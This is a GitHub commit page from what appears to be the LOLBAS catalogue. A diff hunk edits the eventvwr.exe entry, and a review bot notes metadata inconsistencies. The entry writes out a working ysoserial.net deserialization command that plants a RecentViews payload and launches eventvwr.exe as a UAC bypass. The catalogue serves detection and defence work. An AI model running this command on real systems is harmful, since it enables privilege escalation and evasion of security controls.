Add vsls-agent lolbin and committing a few other changes (#263)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
bohops
2023-02-25 13:47:44 -05:00
committed by GitHub
parent ded90467a8
commit cd16f0aff3
6 changed files with 35 additions and 3 deletions

@@ -14,9 +14,9 @@ Commands:
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: Execute
Category: UAC Bypass
Privileges: Administrator
MitreID: T1202
MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
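
Review bot: the Usecase line is left untouched and still reads "Execute a command to bypass security restrictions that limit the use of command-line interpreters", which is the wording for indirect command execution (T1202), while the hunk carries both Category: Execute / MitreID: T1202 and Category: UAC Bypass / MitreID: T1548.002. If the entry is being reclassified as a UAC bypass, update Usecase to describe that so the three fields agree, since detection content keyed on Category and MitreID will otherwise be mapped against a mismatched description. The unchanged Command line also has a stray space in "- g DataSet", which should read "-g DataSet" while this entry is being edited. The commit title only mentions vsls-agent, so a line in the message naming this reclassification would help anyone tracking technique mappings.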